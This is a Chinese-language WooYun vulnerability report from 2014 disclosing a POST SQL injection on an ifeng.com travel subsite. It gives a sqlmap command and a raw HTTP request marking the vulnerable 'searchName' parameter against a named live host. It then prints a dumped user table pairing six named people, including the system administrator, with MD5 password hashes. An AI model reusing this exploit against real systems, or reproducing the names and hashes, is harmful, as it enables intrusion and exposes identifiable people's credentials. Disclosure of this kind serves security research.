漏洞概要关注数(2)关注此漏洞

漏洞概要
关注数(
2
)
关注此漏洞
缺陷编号：
WooYun-2014-85502
漏洞标题：		凤凰子站存在POST SQL注射漏洞（系统管理员密码hash泄漏）
相关厂商：
凤凰网
漏洞作者：
路人甲
提交时间：		2014-12-02 09:56
公开时间：		2014-12-02 11:09
漏洞类型：		SQL注射漏洞
危害等级：		中
自评Rank：		5
漏洞状态：		
															漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源：
http://www.wooyun.org
Tags标签：
php+数字类型注射
php
0
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-12-02：	细节已通知厂商并且等待厂商处理中
2014-12-02：	厂商已经主动忽略漏洞，细节向公众公开
简要描述：
凤凰网某子站SQL注入漏洞未对用户输入正确执行危险字符清理
详细说明：
凤凰网某子站SQL注入漏洞未对用户输入正确执行危险字符清理
POST参数searchName存在注入，将下面HTTP请求保存为sql_test_10
python sqlmap.py -r /root/sqlmap/sql_test_10 --time-sec=2 --dbms=mysql --banner
code 区域
POST /lvyou/list.html HTTP/1.1
Content-Length: 344
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=9A1F8F3E628A1B18F3228ECC332E5855
Host: app.gzzs.ifeng.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
searchName=*&search_type=0
Database: gzzs
Table: user
[6 entries]
+-------+----------------------------------+
| name  | password                         |
+-------+----------------------------------+
| 系统管理员 | 89e6beac53e1381d20b075e536d7328e |
| 胡爽    | e10adc3949ba59abbe56e057f20f883e |
| 戴耀邦   | 10158c26fbcae282f9b1d5788fafcc2d |
| liujy | 827ccb0eea8a706c4c34a16891f84e7b |
| 刘杰羽   | 0f4f72268325e0affe601d4138ead163 |
| 王忠庆   | 827ccb0eea8a706c4c34a16891f84e7b |
+-------+----------------------------------+
漏洞修补方法：参数化SQL语句
漏洞证明：
修复方案：
漏洞修补方法：参数化SQL语句
版权声明：转载请注明来源
路人甲
@
乌云
漏洞回应
厂商回应：
危害等级：无影响厂商忽略
忽略时间：2014-12-02 11:09
厂商回复：
http:///bugs/wooyun-2010- 已经修复的漏洞
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分